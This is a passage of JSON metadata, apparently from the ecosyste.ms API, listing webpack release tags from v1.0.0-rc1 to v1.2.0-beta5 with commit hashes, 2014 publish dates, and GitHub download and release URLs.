https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_